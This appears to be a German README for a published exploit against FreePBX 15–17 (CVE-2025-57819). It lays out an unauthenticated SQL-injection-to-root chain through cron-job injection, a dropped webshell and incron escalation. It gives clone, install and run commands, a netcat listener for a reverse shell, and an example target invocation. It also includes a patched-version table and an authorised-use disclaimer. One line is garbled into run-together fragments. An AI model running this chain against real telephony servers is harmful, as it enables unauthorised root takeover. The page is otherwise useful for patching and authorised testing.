
Full-chain CVE-2025-57819 PoC für FreePBX 15, 16 und 17: nicht authentifizierte SQLi zu RCE und Root-Übernahme.
Full-chain PoC für CVE-2025-57819. Nicht authentifizierte fehlerbasierte SQL-Injection im Endpoint-Modul von FreePBX führt über Cron-Job-Injektion und Incron-Privilege-Eskalation zu einer Root-Shell.
Nur für autorisierte Tests und Forschung. Nicht gegen Systeme verwenden, die dir nicht gehören.
SQLi (EXTRACTVALUE) → INSERT cron job → webshell drop → incron trigger → root shell
/admin/ajax.phpasteriskfwconsole-Hook als root auslöst.git clone https://github.com/ozcanpng/CVE-2025-57819-FreePBX-RCE2Root
cd CVE-2025-57819-FreePBX-RCE2Root
pip install -r requirements.txt
python3 CVE-2025-57819.py <target> <lhost> <lport> [--cleanup]
Starte zuerst einen Listener:
nc -lvnp 9999
Dann führe aus:
python3 CVE-2025-57819.py freepbx.example.com 192.168.1.50 9999
--cleanup entfernt die Webshell und den Cron-Job nach der Ausnutzung.
FreePBX mit installiertem endpoint-Modul. Der brand-Parameter in /admin/ajax.php wird unbereinigt in eine SQL-Abfrage übergeben.
| FreePBX | Patch-Version |
|---|---|
| 15.x | 15.0.66 |
| 16.x | 16.0.89 |
| 17.x | 17.0.3 |
ozcanpng — github.com/ozcanpng — ozcanpng.dev